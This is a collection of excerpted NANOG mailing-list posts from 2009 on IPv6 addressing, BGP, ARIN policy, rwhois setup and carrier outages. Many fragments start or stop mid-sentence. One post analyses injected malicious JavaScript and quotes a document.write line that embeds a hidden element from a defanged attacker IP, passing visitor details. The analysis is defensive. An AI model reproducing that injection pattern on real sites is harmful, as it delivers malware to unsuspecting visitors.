it. Never saw an outright block. A call to the support group
actually got if fixed in about 45 minutes. Call and complain if it's
broken. You are the customer at that point.
--Chris
On Wed, 21 Oct 2009, Alex Balashov wrote:
| I was not aware that tools or techniques to do this are widespread or highly
| functional in a way that would get them adopted in an Internet access control
| application of a national scope.
Doesn't necessarily have to be hugely accurate. The
of configuration management?
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
Not sure if this will get you all the info you are looking for, but it's
open source and works well for our needs.
http://nfsen.sourceforge.net/
Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP
http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com
as hell a while back (when it
went through 7 companies to go between cities 90 miles apart).
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
On 13/10/09 15:33, Justin Shore wrote:
He didn't really give much of a reason for the /127s yet. I think it's
coming up in a later session. I think it basically boiled down to
whether or not the customer would actually use anything bigger. I'll
write back when we get into that discussion.
We are running IPv6 over 209 currently.
2607:F8E8::/32
Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP
http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com
David Temkin wrote:
I contacted 209 yesterday (due to the ongoing Cogent/174 silliness
(and
subsequently Qwest others) are accepting. I'd suspect they'll accept
most anything.
2620:0:380::/48 x:x:x::x 1537 209 6939 18508 I
2620:0:380:2::/64 x:x:x::x 1537 209 6939 18508
393222 I
--
Chris
/64 or /126 (or maybe /124 if you were going to
delegate reverse DNS?), but why /112 and 16 bits for node identifiers
on a point-to-point link?
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
/32s around in my network; do you assign a /128, a /64 (with
only one address in use), a /112, or something else?
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
Once upon a time, Nathan Ward na...@daork.net said:
On 14/10/2009, at 2:14 PM, Chris Adams wrote:
What about web-hosting type servers? Right now, I've got a group of
servers in a common IPv4 subnet (maybe a /26), with a /24 or two
routed
to each server for hosted sites. What is the IPv6
that still means we are
covered until the population hits around 2,600,000,000,000,000,000.
Chris
-
Chris Owen - Garden City (620) 275-1900 - Lottery (noun):
President - Wichita (316) 858-3000
MMS or quaility control: pick one! :)
On 10/4/09, Clue Store cluest...@gmail.com wrote:
Mine's rebooted at leat 3 times a day sine the upgrade :(
What ever happened to quality control
http://discussions.apple.com/thread.jspa?threadID=2152619tstart=0
--
Sent from my mobile device
Anyone else seeing Google's Gmail down right now? Seems to have been
down since 10am CST. We are connected through Chicago.
downforeveryoneorjustme.com is also reporting it's down.
--
Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP
http://uplogon.com
It was short-lived, seems to be back up now, but a little flaky.
Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP
http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com
Chris Gotstein wrote:
Anyone else seeing Google's Gmail down right now? Seems
We don't use gmail for any of our services, but a lot of our ISP
customers use gmail. So when they see gmail being down, they assume
that their internet connection is down or that we are the reason that
gmail is not working.
Chris Gotstein, Sr Network Engineer, UP Logon
not use an e-mail to SMS gateway from whichever carrier?
They tend to be unreliable (long delays and dropped messages). Also,
how can your monitoring system email the gateway when the network is
down?
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I
since.
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
? Is it possible to make policy to address
this sort of problem?
-chris
If this is the case one could argue that ARIN should be reserving this
worthless address space to be used when they receive similar requests
in the future. There's no reason personX should get fresh, clean address
space when
On 08/09/09 21:34, Joe Greco wrote:
Show me ONE major MTA which allows you to configure an expiration for
an ACL entry.
This is fairly trivial to do with Exim by storing your acl entries in a
database or directory with a field/attribute for expiry, and an
appropriate router configuration. No
On 03/09/09 07:47, Mark Newton wrote:
We run one which isn't connected to Telstra :-)
There are media reports this morning of major outages in Telstra's domestic
network.
http://www.australianit.news.com.au/story/0,24897,26021106-15306,00.html
Thank goodness PPC-1 is nearing completion, eh?
with suggestions and ideas in
this vein - I have some vehicles in place to start making this happen
quickly with a bit of help)
/soapbox
~Chris
--
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weblog.chrisgrundemann.com
www.burningwiththebush.com
www.coisoc.org
that create real security by encouraging better
computer hygiene. -
http://www.eff.org/deeplinks/2009/04/cybersecurity-act
$0.02
~Chris
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weblog.chrisgrundemann.com
www.burningwiththebush.com
www.coisoc.org
with BellSouth/ATT for phone service (and DSL for Internet)
wasn't such a bad idea after all.
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
be a non-profit; they'd charge everybody the same fees for access
to the same type of cable and they'd maintain the plant and colo
facilities.
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
to implement an exchange of IPv6 traffic? Their NOC referred us back to
our account manager, who said We don't do IPv6. A quick Google search
would seem to indicate otherwise...
Thanks!
--
Chris Gotstein
Sr Network Engineer
UP Logon/Computer Connection UP
500 N Stephenson Ave
Iron Mountain
otherwise...
When I asked a few months ago, the NOC gave me the we don't do IPv6
answer. Looking at BGP, I only see AS 209 behind HE (with 1 prefix and
2 transit prefixes), so I would guess that's still basically the case.
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator
.
Granted, the cable plant (whether copper, fiber, coax, or avian
datagram) is not quite the same, but the bean-counters look at it as we
were supposed to have bignum-year ROI on project 1, 2, and 3, and we
didn't get it; why should I believe we'll get it on project 4?.
--
Chris Adams cmad
where high-speed Internet is not
currently feasible (or at least not at a price that those residents want
to pay). I live half a mile from a six lane highway; that doesn't mean
that we have to build six lane highways to within half a mile of
everybody in the country.
--
Chris Adams cmad
remember what the interface status was on both
sides. This does correlate to why it's working on the 2950's as they
don't support ISL and would likely negotiate into dot1q.
Chris
Christopher Greves | Senior Systems Engineer One North Lexington Ave,
9th Floor - White Plains, NY 10601 T 914-826
been mulling over how to do it, and i think i'm making it
more complicated than it needs to be. You can hit me offlist if you
wish to help. Thanks.
--
Chris Gotstein
Sr Network Engineer
UP Logon/Computer Connection UP
500 N Stephenson Ave
Iron Mountain, MI 49801
Phone: 906-774-4847
Fax: 906-774
and /48's to larger customers.
I'm just not able to wrap my brain around the subnetting that needs to
be done on the router. Like i said before, i think i'm just over
complicating it in my mind.
Chris Gotstein
Sr Network Engineer
UP Logon/Computer Connection UP
500 N Stephenson Ave
Iron
the wheel, but usually they
are startups looking to make a quick buck by patenting and licensing
their technology that will be the savior of the Internet (and so they
don't get far).
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak
sites, and many of
those things are not in a public index. For example, most people type
in their friends' email addresses (at least into an address book).
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's
! -
Gimli
http://www.dominiceidson.com/
--
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Sr Network Engineer
UP Logon/Computer Connection UP
500 N Stephenson Ave
Iron Mountain, MI 49801
Phone: 906-774-4847
On 29.07.2009, at 22:52, Jason LeBlanc wrote:
Brandon Butterworth wrote:
NAVOG works for me.
I'd prefer Voice Operators' Group Online Network
brandon
*claps*
Imagine the poetry you have to listen to when _those_ guys put you on
hold...
Apparently not
Back to the kids' table !
On Mon, Jul 27, 2009 at 12:38 AM, William Pitcock neno...@systeminplace.net
wrote:
On Sun, 2009-07-26 at 20:05 -0700, Shon Elliott wrote:
There has been alot of customers on our network who were complaining
about ACK
scan reports coming from
This only protects ISPs from, upon being served notice, being liable for
content
A majority of the CDA was overturned, as it violates both first and fifth
amendments. What is left of it only applies to ISPs PUBLISHING (*not*
filtering) content
This is Net Neutrality realm
On Mon, Jul 27, 2009
On Mon, Jul 27, 2009 at 1:37 AM, Shon Elliott s...@unwiredbb.com wrote:
Chris,
Have you even read any of the other posts on here.
I fade in and out
I have been talking about
spoofed packets in this thread multiple times.
man engrish
I do know what it is. I would appreciate you
Shon wrote:
Seth,
I said it could be, not that it is. Thanks for pointing that out. However,
I
believe the reason they are being blocked at ATT is the main reason I
supplied
on my first post. The DDoS attack issue is the main ticket here.
The ACK storms arent coming from the 4chan servers
Uh.
You posted on Twitter.
The most trusted name in [?]
On Mon, Jul 27, 2009 at 12:17 AM, John Bambenek bambe...@gmail.com wrote:
We'll take data from **Trusted** sources.
I'm just not going to take a public open mailing list post as evidence at
this point.
chris rollin wrote:
Shon
On 23/07/09 22:22, goe...@anime.net wrote:
Seems rather unwise to filter your abuse mailbox.
- The following addresses had permanent fatal errors -
ab...@btopenworld.com
(reason: 554 Message not allowed - UP Email not accepted for policy
reasons. Please visit
Making every effort to not pimp my employer (pccw), I would say that
the Equinix in HK is good and they have a decent equinix direct
product (one bill to pay). If you're looking more for a managed
colo, pccw owns powerbase which does that sort of thing. HKCOLO is
good but space is hard to come
Thanks to all that contacted me offlist and on, I believe it should be
sorted shortly in all the relevant databases.
Thanks again,
Chris
is that it's a
canned response by first-line support.
Also, does anyone happen to know which geolocation databases hulu use?
Thanks,
Chris
ML wrote:
Chris Taylor wrote:
Would someone from hulu.com please contact me offlist?
Alternatively, if anyone has contact details for a vaguely clueful
person there, that would be appreciated.
We had a new range allocated to us by ARIN around 6 months ago for our
US business, and hulu
- their database appears to be up to date as well.
I can't check Google at this second, as I'm based in the UK - I'll be
setting something up for such tests tonight or tomorrow, but I seem to
remember that we've previously spoken to them about it.
Thanks,
Chris
-Original Message-
From
or just plugging into an existing, builtin
ethernet port, which do you think most people will choose?
Also, if you are plugging in a lower-speed link, you can plug ethernet
in a $1000 switch and trunk it to a router, while a mux for T1/T3/OCx
circuits costs a lot more.
--
Chris Adams cmad
On 04/07/09 17:07, Roland Perry wrote:
That's the kind of marketing-led response I was hoping to hear.
But the UK National Rail system now uses Tweets to tell customers about
disruptions on the trains, and several major UK government departments
and news organisations use it for announcements
,
Chris Ledford
NOC ATOG Engineer
CCNA/CCSP/CVOICE
A+/NET+/SEC+/LINUX+/MCPe
Connexion Technologies
Office:1240 Commerce Drive, Suite A
Gulf Shores, AL 36542
Mailing: P O Box 1245
Gulf Shores, AL 36547pan
NOC: 251-224-0662
P | 251.224.0972 or 251-224-0800 ext 65071
F | 251.224.0830
C | 251.923.8340
Cisco aironet ...reliable and the ony way to go ...
Chris ledford
CCNA CCSP CWLSS
--Original Message--
From: nanog-requ...@nanog.org
To: nanog@nanog.org
ReplyTo: nanog@nanog.org
Subject: NANOG Digest, Vol 17, Issue 51
Sent: Jun 18, 2009 9:23 AM
Send NANOG mailing list submissions
What's interesting is that the !NANOG part of the universe presumes
the maintenance was to be performed by Twitter, not by their carrier
(i.e. server, not network, upgrades). Given the fact that the
WhaleFail has become a commonly-recognizable sight, I can see this
make people a bit, um,
Do you have a link to the information on how to get that setup?
---Chris
On Jun 10, 2009, at 1:05 PM, Chris Stone wrote:
Can someone please point me in the direction of an rwhoisd
solution to
be run on a CentOS Linux platform? ARIN is now punting rwhois
queries
to us and frankly i've
figured I would bring it up.
~Chris
PS - if you are interested in TOS related stuff, might be worthwhile
to check out http://www.tosback.org/timeline.php a new project
launched by the EFF (no affiliation, just fyi)
Vern, Berkley, ICIR
nor infer that they were not trustworthy. Just pointing out a
possible place for improvement from my view.
~Chris
I used this guide and it worked quite well. The writer was using
FreeBSD but I installed onto Ubuntu and ran into little to no issues.
http://www.unixadmin.cc/rwhois/
---Chris
On Jun 6, 2009, at 10:37 AM, Jeffrey Lyon wrote:
NANOGers,
Can someone please point me in the direction
but the documentation on it is ghastly to say the
least.
If you use IPPlan to manage your IP allocations, it comes with a whois
daemon that'll automagically use the information from your IPPlan sql
database.
Chris
customers have gotten from it. You can see a sample
report at:
http://netalyzr.icsi.berkeley.edu/restore/id=example-session
- Vern
Why no privacy policy? Or am I just partially blind? Is an answer in
a FAQ legally binding?
~Chris
--
Chris Grundemann
weblog.chrisgrundemann.com
way to link the two
sites is via a tunnel (GRE or IPIP). Use the upstream IP on each router
as the local endpoint, and then run some routing protocol over the
tunnel.
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself
Once upon a time, Deepak Jain dee...@ai.net said:
Which is why, if you have a satellite, you often position DIRECTLY
over the antenna you are sending to
Unless your target is on the equator, you don't position a satellite
directly over anything.
--
Chris Adams cmad...@hiwaay.net
Systems
a particular longitude. They move up and
down in latitude, so it isn't over a given point except twice per day
(or only once at the extremes).
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough
appreciate it doesn't
get around security concerns but hey ho.
As far as as security, why have myDNS world-reachable at all? You can
have bind feed off of myDNS without having anyone on the outside ever
talk to the myDNS backend.
Chris
to create a custom graph
and click the appropriate checkbox. If you want to view a large number
of interfaces with their errors on a single page, you can create a
Custom View that includes errors for any number of selected interfaces.
-Chris
On May 28, 2009, at 12:03 PM, Ric Messier wrote
, neutral, and
ground (provides 1 208V circuit and/or 2 120V circuits) or a NEMA L21
(5 wire) connector to get all three phases, neutral, and ground
(provides 3 208V circuits and/or 3 120V circuits).
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't
is likely to stay up when a peer has gone down,
and BFD would need to be negotiated peer-by-peer, is there a
recommendation other than the default 60-180?
Would going below 60-180 without first discussing it with your peers, tend
to piss them off?
Chris
Once upon a time, Bobby Kuzma bku...@electronerdz.com said:
Does anybody have any information on this? I've had 4 customers on Qwest for
Internet connectivity in Florida drop off the net within a few minutes of
each other.
I'm have Qwest via Atlanta and I'm not seeing any issues.
--
Chris
to such an RFC statement, assuming
it exists.
Thanks!
Chris
On 11.05.2009, at 22:34, Patrick W. Gilmore wrote:
On May 11, 2009, at 4:29 PM, Chris Meidinger wrote:
I would be grateful for a pointer to such an RFC statement,
assuming it exists.
Why would an RFC prohibit this?
Most _implementations_ do, but as far as network rules in general
On 11.05.2009, at 23:00, Charles Wyble wrote:
What does two interfaces in one subnet mean?
Two NICs? Or virtual interfaces?
Two NICs, as in physical interfaces.
document, to show to customers to
convince them to stop trying to hack things to make it work.
Chris
On 11.05.2009, at 23:31, Dan White wrote:
Chris Meidinger wrote:
Hi,
This is a pretty moronic question, but I've been searching RFC's on-
and-off for a couple of weeks and can't find an answer. So I'm
hoping someone here will know it offhand.
I've been looking through RFC's trying to find
.
Chris
On 05.05.2009, at 09:33, Seth Mattinen wrote:
Tim Tuppence wrote:
Hello,
I am seeing that www.google.cat resolves from three different
networks.
It even resolves from here: http://www.squish.net/dnscheck/
What is going on?
Why are you expecting it not to?
I think the real question
| therefore you are
Atlantic Net |
_ http://www.lewis.org/~jlewis/pgp for PGP public key_
I assume you checked route-server.twtelecom.net for the route?
--
Chris Grundemann
weblog.chrisgrundemann.com
Oddly, none of the courses in the event discuss IPv6.
http://www.intelembeddedevent.com/
Intel® Embedded eVent We’re standing at the forefront of the Embedded
Internet Era. The opportunities are yours.
The networked world is growing at a tremendous pace. In just six
years, it’s expected
/quagga-0.99.11-BGP-4-byte-ASN-bug-fixes.patch
(the patches are identical. naming is just for clarity.)
Chris
the servers.
That depends on the devices on each end. For example, some switches can
only hash on MAC addresses, some can look at IPs, and some can look at
ports.
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself
rational for any argument at all really.
~Chris (speaking for myself)
(1) - https://www.arin.net/knowledge/pdp/
(2) - https://www.arin.net/participate/mailing_lists/index.html
(3) - mailto:i...@arin.net
Shane Ronan
--Opinions contained herein are strictly my own--
On Apr 21, 2009, at 9:01
submitting the request. If ARIN
really
wants to get the interest of CEOs, raise the price!
And punish those that do play by the rules? ARIN's prices are already
crazy high for what they actually do.
Chris
- --
Chris
years.
Chris
- --
Chris Owen - Garden City (620) 275-1900 - Lottery (noun):
President - Wichita (316) 858-3000 -A stupidity tax
Hubris Communications Inc www.hubris.net
. That is an average
salary of $121,428 across all employees.
Internet Research and Support is $164,500
Travel (which includes travel for board members, etc) is $1,315,349.
There is more detail but older data at:
https://www.arin.net/about_us/corp_docs/annual/2007_audited_financials.pdf
Chris
Once upon a time, Jo Rhett jrh...@netconsonance.com said:
Since
virtual web hosting has no technical justification for IP space, I
refuse it.
SSL and FTP are techincal justifications for an IP per site.
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet
Once upon a time, Ricky Beam jfb...@gmail.com said:
On Tue, 21 Apr 2009 18:40:30 -0400, Chris Adams cmad...@hiwaay.net wrote:
SSL and FTP are techincal justifications for an IP per site.
No they aren't. SSL will work just fine as a name-based virtual host with
any modern webserver
help but think Too little, too
late.
Chris
- --
Chris Owen - Garden City (620) 275-1900 - Lottery (noun):
President - Wichita (316) 858-3000 -A stupidity tax
Hubris Communications Inc
have passed
and so problem resolution tends to get extended.
In cases that are temporarily unfixable, such as router bug, we have been
known to change the port config such that the rogue packets are just
dropped/logged rather than answered with a shutdown, but that is rare.
Chris
SIX Janitor
I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured):
document.write(embed
src=\hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\
width=\0\ height=\0\
You beat me to it.
-ChrisAM
On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson fergdawgs...@gmail.com wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson fergdawgs...@gmail.com
wrote:
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin
mile or two. How large is the fiber plant?
Miles and miles of continuous fiber, every inch of which is equally
important. A lot of it here is even on poles, not buried.
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody
On 10/04/09 03:32, John Martinez wrote:
BT Americas?
Oh dear, and just after BT suffered a big cut in London. Who needs
vandals when there's contractors about?
http://www.theregister.co.uk/2009/04/08/bt_hole_hits_vodafone/
http://www.flickr.com/photos/23919...@n00/3426407496/
Monterey Road just north of Blossom Hill, San Jose
On Thu, Apr 9, 2009 at 11:11 AM, Mike Lyon mike.l...@gmail.com wrote:
Anyone know where the actual cut is?
On 4/9/09, David W. Hankins david_hank...@isc.org wrote:
On Thu, Apr 09, 2009 at 08:14:15AM -0700, Craig Holland wrote:
Just dropping
on other mail servers but I can't get a hold of ATT.
Any help would be greatly appreciated!
---Chris
On 18.03.2009, at 12:20, Saqib Ilyas wrote:
I'm back! Thanks again to all those who replied. I am wondering how a
service provider might assess availability or reliability figures
using
active measurements. Granted that one could set up traffic generators
between the two PoPs which will be
; what if it was a DoS attack, spamming bot, etc.?
Do you think Covad would respond to a DMCA complaint like that?
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
that connection. However, IPSLA is the wrong tool for a one-off test
of whether you can push a Mbps from site A to site B, because you need
to saturate the link to do that test. IPSLA is great for monitoring
things like jitter.
HTH,
Chris
Thanks and best regards
On Mon, Feb 23, 2009 at 1:19 PM
to doing it for Juniper firewall policers, but I
pretty sure the info is in a MIB.
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
Can a Yahoo postmaster ping me off list? I've got a couple of servers
that appear to be mis-categorized.
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
Once upon a time, Matthew Petach mpet...@netflight.com said:
On 3/3/09, Chris Adams cmad...@hiwaay.net wrote:
Can a Yahoo postmaster ping me off list? I've got a couple of servers
that appear to be mis-categorized.
Contact information for the Yahoo postmasters is listed at
http
out. Broadcast, multicast,
flooding for unknown MACs (or switching failures), ...
--
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
How much scheduled downtime was there?
---Chris
On Feb 23, 2009, at 11:46 AM, Justin Wilson - MTIN wrote:
In a Former Life we used Comcast for transport for a school
corporation.
In the 3 years we used them we have 10 minutes of unscheduled
downtime.
Justin
'No ip domain lookup' will solve your problem instance below. Eg dns resolution
attempt on typos.
-Original Message-
From: Tom Storey t...@snnap.net
Date: Tue, 24 Feb 2009 09:32:28
To: Bruce Groblerbr...@yoafrica.com
Cc: nanog@nanog.org
Subject: RE: FW: Ctrl+Shift+6 then X
FWIW Ive
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